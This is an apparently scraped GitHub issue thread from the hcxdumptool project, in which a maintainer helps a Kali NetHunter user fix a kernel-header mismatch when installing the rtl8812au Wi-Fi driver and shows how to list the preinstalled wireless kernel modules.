Report related issues to the site, from which you downloaded the driver
Running is third party drivers means that you will run into problems.
from hcxdumptool.
Is their a file with the stock kernal drivers in nethunter?
from hcxdumptool.
Stock drivers means that the driver comes with the Linux kernel:
That is not the case on rtl8812au.
You have to go for a third party driver, e.g.:
$ git clone https://github.com/aircrack-ng/rtl8812au
from hcxdumptool.
That's the same one iv been trying to install
from hcxdumptool.
First of all you have to fix your configuration problems:
Looks like kernel header api doesn't match to your kernel headers: 4.14 vs 6.5
An example:
I'm on
$ uname -r
6.5.9-arch2-1
So my api headers should be on 6.x:
linux-api-headers 6.4-1
linux-headers 6.5.9.arch2-1
from hcxdumptool.
from hcxdumptool.
Is there a way to find what drivers came preinstalled with my nethunter kernel
from hcxdumptool.
$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/
Should give a list like this:
admtek broadcom intersil mediatek quantenna rsi ti
ath cisco legacy microchip ralink silabs virtual
atmel intel marvell purelifi realtek st zydas
and
$ ls /usr/lib/modules/$(uname -r)/kernel/drivers/net/wireless/mediatek
Should show you the MediaTek drivers:
mt76 mt7601u
from hcxdumptool.
from hcxdumptool.
Can't work, because it is a Linux (only) example.
You have to search for the modules directory of you distribution.
BTW:
It looks like it is not a official KALI nethunter distribution.
from hcxdumptool.
I used the nethunter installer for my phone makecsnd model so should be the official one
from hcxdumptool.
What is the output of uname -r
from hcxdumptool.
Related Issues (20)
- hcxdumptool: invalid option -- 'o' HOT 5
- HCXDumpTool runtime error on MediaTEK MT7922 / MT7921E HOT 19
- HCXDumpTool & MediaTEK MT7922 / MT7921E (Part 2) HOT 3
- orange pi zero HOT 1
- hcxdumptool: unrecognized option 'enable_status=15' HOT 2
- Is the problem in the driver or in the operating system? HOT 1
- Add a gpiowait.svg alongside gpiowait.odg HOT 2
- attack behaviors rules HOT 65
- openwrt: Issue finding interfaces HOT 44
- Android build instructions HOT 5
- prevent spoofed beacons from transmitting HOT 3
- How can I delete this tool? HOT 2
- hcxdumptool missing options HOT 2
- What to use it in 2024?
- error using option "-o" to write the dump file.
- Older version HOT 1
- undirected proberequest frames. HOT 1
- rds Usage HOT 1
- Atheros chipset (ERRORs caused by misconfigured KALI) HOT 21
- Arrays explained HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from hcxdumptool.